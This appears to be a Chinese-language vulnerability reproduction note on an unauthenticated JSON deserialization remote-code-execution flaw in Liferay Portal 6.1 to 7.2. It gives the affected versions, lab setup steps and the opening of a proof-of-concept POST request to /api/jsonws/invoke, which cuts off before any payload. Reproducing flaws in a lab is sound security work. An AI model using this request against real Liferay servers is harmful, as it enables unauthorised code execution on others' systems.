漏洞说明: Liferay是一个开源的Portal(认证)产品,提供对多个独立系统的内容集成,为企业信息、流程等的整合提供了一套完整的解决方案,和其他商业产品相比,Liferay有着很多优良的特性,而且免费,在全球都有较多用户. 该洞是个反序列化导致的rce,通过未授权访问其api传递json数据进行反序列化,危害较高 影响范围: Liferay Portal 6.1.X Liferay Portal 6.2.X Liferay Portal 7.0.X Liferay Portal 7.1.X Liferay Portal 7.2.X 环境搭建: https://github.com/liferay/liferay-portal/releases/tag/7.2.0-ga1 下载带tomcat的集成版,接下来就可以运行了,安装过程一路默认配置即可 漏洞复现: poc: POST /api/jsonws/invoke HTTP/1.1 Host: php.local: 8080 Content -Length: 2335 Content -Type: application/x-www-form- urlencoded Connection: close cmd ={"/expandocolumn/add-column":{}}&p_auth=o3lt8q1F&formDate